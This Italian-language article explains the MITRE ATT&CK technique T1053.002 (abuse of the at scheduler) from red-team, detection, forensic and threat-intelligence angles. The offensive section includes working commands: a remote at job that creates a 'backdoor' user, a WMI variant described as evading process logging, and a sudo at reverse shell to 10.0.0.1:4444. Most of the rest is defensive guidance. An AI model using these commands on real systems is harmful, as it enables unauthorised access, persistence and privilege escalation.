Pianificazione Malevola con At: Scheduled Task/Job — At (T1053.002)

La bellezza offensiva di at risiede nella sua semplicità: è un binario legittimo, firmato dal sistema operativo, che non richiede alcun download aggiuntivo. In un engagement red team, questo significa zero artefatti sospetti su disco e nessun trigger per le soluzioni EDR che monitorano il caricamento di PE sconosciuti.

Windows — Esecuzione locale e remota

Su Windows, l'uso classico prevede la pianificazione di un comando da eseguire in un momento specifico. Anche se il sistema segnala at come deprecato, il comando funziona perfettamente se il servizio Task Scheduler è attivo e l'utente è amministratore locale:

at 09:00 /interactive cmd.exe /c "whoami > C:\temp\output.txt"

Per il lateral movement, la vera potenza emerge nell'esecuzione remota. Specificando un target di rete, il job viene registrato sulla macchina vittima ed eseguito nel contesto SYSTEM:

at \192.168.1.50 14:30 cmd.exe /c "net user backdoor P@ssw0rd /add"

Un vettore alternativo, particolarmente interessante perché bypassa la riga di comando, sfrutta la classe WMI Win32_ScheduledJob. In PowerShell:

([wmiclass]'\.\root\cimv2:Win32_ScheduledJob').Create("cmd.exe /c calc.exe", "20251215093000.000000+000")

Questa variante non genera un processo at.exe nel log, rendendo la detection basata su process creation meno efficace.

Linux — Privilege escalation e shell escape

Su sistemi Linux, at consente di pianificare job che vengono eseguiti dal demone atd. Se il file at.deny è vuoto o assente e at.allow non esiste, qualsiasi utente può schedulare comandi:

echo "/bin/bash -i" | at now + 1 minute

In ambienti con shell ristrette (rbash, restricted ksh), at diventa un vettore di escape: il job viene eseguito da atd in un contesto shell non ristretto. Se il binario at è configurato nel file sudoers, la privilege escalation è immediata:

sudo at now + 1 minute <<< "/bin/sh -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Tool di supporto

Per automatizzare la catena d'attacco in ambienti Active Directory, CrackMapExec (open source, ora rinominato NetExec) supporta la creazione di task schedulati via at su target remoti, integrandosi con credenziali ottenute tramite pass-the-hash o Kerberoasting. Il tool è disponibile sul repository GitHub del progetto NetExec.

Nell'arsenale red team, conviene combinare at con una reverse shell o un beacon C2 per validare che il job venga effettivamente eseguito nel contesto SYSTEM e che la persistence sopravviva al reboot.

Il vantaggio del difensore con at è che la superficie di detection è ben definita: il binario è noto, i log sono prevedibili e i percorsi di artefatti sono documentati. Il rischio reale è il volume di falsi positivi in ambienti legacy dove at potrebbe essere ancora usato da script di manutenzione.

Windows — Log sources e regole

La detection primaria si basa su due fonti: i log Security e Sysmon. L'analytic AN0943 intercetta la creazione di task tramite at.exe o la classe WMI Win32_ScheduledJob, seguita dall'esecuzione di processi anomali da parte di svchost.exe o taskeng.exe.

Per Sysmon, configura la cattura di EventCode 1 (Process Create) filtrando su at.exe come Image o ParentImage. L'EventCode 11 (File Create) cattura la scrittura dei file di task sotto il percorso C:\Windows\System32\Tasks. Sul versante Security log, EventCode 4698 (A scheduled task was created) è il segnale canonico.

Il tuning è essenziale per evitare la fatica da alert. Tre criteri chiave emergono dai dati di detection:

• TaskUser: baseline degli utenti autorizzati a creare job. Un account di servizio o un utente non-admin che invoca at è immediatamente sospetto.
• ExecutionTimeWindow: il ritardo tra registrazione del task ed esecuzione. Job pianificati per "adesso" o entro pochi minuti sono tipici dell'uso offensivo; quelli a distanza di ore possono essere legittimi.
• CommandLinePattern: payload come cmd.exe /c powershell, script con encoding Base64 o binari in percorsi temp sono red flag immediate.

Un controllo preventivo fondamentale riguarda la chiave di registro HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl: configurandola per forzare l'esecuzione nel contesto dell'account autenticato anziché SYSTEM, si neutralizza il vettore di privilege escalation. Questa configurazione è distribuibile via GPO.

Linux e macOS — Auditd e Unified Log

Su Linux, l'analytic AN0944 si appoggia ad auditd con eventi SYSCALL per tracciare le invocazioni di at. Monitora le modifiche ai file sotto /var/spool/cron/atjobs e valuta l'entropia dei payload — script offuscati o con entropia elevata meritano escalation immediata.

Su macOS, l'analytic AN0945 sfrutta il Unified Log e le query osquery per intercettare invocazioni di at da parte di root con comandi insoliti. Verifica inoltre che i file at.allow e at.deny siano correttamente configurati sotto /usr/lib/cron/at: una configurazione permissiva è di per sé un finding da correggere.

L'analisi forense di un abuso di at è gratificante perché il sistema operativo lascia tracce abbondanti, su tutti e tre i sistemi operativi. La chiave è sapere dove cercare e come correlare temporalmente la registrazione del task con la sua esecuzione.

Windows — Artefatti chiave

Il punto di partenza è il registro di sistema. Ogni task creato con at genera una chiave sotto Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1 (e successivi At2, At3…). Questa chiave contiene il timestamp di creazione, l'account utilizzato e il riferimento al file XML di definizione del task.

I file di task si trovano in C:\Windows\System32\Tasks e contengono in chiaro il comando pianificato, l'utente di esecuzione e la schedulazione. Per la timeline, correla questi artefatti con:

I prefetch file di at.exe (sotto C:\Windows\Prefetch\AT.EXE-*.pf) indicano quando il binario è stato eseguito e quante volte. Lo strumento PECmd di Eric Zimmerman (open source) parsifica i file prefetch e ne estrae i timestamp con precisione al secondo.

Nel caso di esecuzione via WMI (Win32_ScheduledJob), la traccia si sposta sul repository WMI in C:\Windows\System32\wbem\Repository. Lo strumento WMI Explorer o il parser python-cim (open source) possono estrarre le classi e gli oggetti persistiti.

Per la correlazione con il lateral movement, verifica i log di autenticazione (EventCode 4624 tipo 3 — Network Logon) provenienti dalla macchina sorgente nello stesso intervallo temporale della creazione del task. Il pattern tipico documentato per gruppi come Threat Group-3390 prevede l'autenticazione di rete seguita dalla registrazione di un job at che installa un RAR auto-estraente contenente un impianto come HTTPBrowser o PlugX.

Linux — Spool e log di atd

Su Linux, i job at vengono scritti come file sotto /var/spool/cron/atjobs (o /var/spool/at a seconda della distribuzione). Ogni file ha un nome codificato che include il timestamp di esecuzione pianificato. Il contenuto del file è lo script shell completo che verrà eseguito — un artefatto forense di valore inestimabile.

Correla con i log di atd in syslog e con gli eventi auditd. Il comando ausearch -sc execve -k at_jobs (se la regola audit è configurata) restituisce tutte le esecuzioni legate ai job pianificati. I file sotto /var/spool mantengono i metadati del filesystem (ctime, mtime) che ancorano il job nella timeline.

macOS — LaunchServices e cron

Su macOS, i file di job risiedono sotto /usr/lib/cron/at e seguono la stessa logica dei sistemi Linux. Il Unified Log cattura le invocazioni tramite il subsystem com.apple.cron, e fsusage permette di tracciare l'attività su disco in tempo reale durante l'analisi live.

L'uso di at per la schedulazione malevola è un tratto distintivo di gruppi APT con un approccio pragmatico: preferiscono i living-off-the-land binary (LOLBin) ai tool custom, riducendo il rischio di attribuzione e semplificando la catena operativa.

Threat Group-3390 (G0027) rappresenta il caso d'uso più articolato. Questo gruppo di matrice cinese utilizza at per schedulare l'esecuzione di archivi RAR auto-estraenti su macchine compromesse all'interno della rete vittima. Gli archivi contengono impianti come HTTPBrowser o PlugX, il che indica una catena ben strutturata: primo accesso → movimento laterale con at → deployment dell'impianto via RAR SFX → comunicazione C2. L'uso di archivi auto-estraenti è significativo perché evita la necessità di avere un decompressore sulla macchina target e riduce il numero di artefatti intermedi.

APT18 (G0026), anch'esso attribuito alla Cina, utilizza at in modo più diretto, sfruttando il task scheduler nativo di Windows per l'esecuzione su reti vittime. Il pattern è meno sofisticato rispetto a Threat Group-3390 ma ugualmente efficace: l'uso del binario di sistema riduce la firma forense al minimo indispensabile.

BRONZE BUTLER (G0060), gruppo legato al Giappone come area di targeting, impiega at specificamente durante la fase di lateral movement. La registrazione di task schedulati su macchine remote permette l'esecuzione di malware senza interazione diretta con la sessione utente, una tecnica che riduce la visibilità dell'attività malevola anche in ambienti con monitoraggio endpoint.

Dal punto di vista dei tool, CrackMapExec (S0488) e MURKYTOP (S0233) automatizzano la creazione di job at remoti. CrackMapExec — oggi proseguito come NetExec — lo fa nell'ambito di campagne di post-exploitation su larga scala in ambienti Active Directory. MURKYTOP, classificato come malware, integra la capacità di schedulare job at remoti nel proprio set di funzionalità, suggerendo un uso mirato piuttosto che opportunistico.

Il pattern geografico è chiaro: tutti e tre i gruppi documentati operano nella regione Asia-Pacifico, con targeting verso organizzazioni governative e industriali. La convergenza sull'uso di at — anziché schtasks o meccanismi più moderni — suggerisce una preferenza per binari con minore copertura di detection, specialmente in ambienti dove le policy di audit non sono state aggiornate per monitorare utility deprecate. Per un TI analyst, la presenza di job at anomali in un'indagine dovrebbe immediatamente orientare l'ipotesi verso attori APAC con obiettivi di spionaggio.

Framework MITRE ATT&CK v16 — T1053.002 (At), tattiche TA0002, TA0003, TA0004. Gruppi: G0027, G0026, G0060. Software: S0488, S0233, S0110. Mitigazioni: M1028, M1047, M1018, M1026. Detection: DET0333 (AN0943, AN0944, AN0945). Integrato con conoscenza professionale per tool e procedure operative.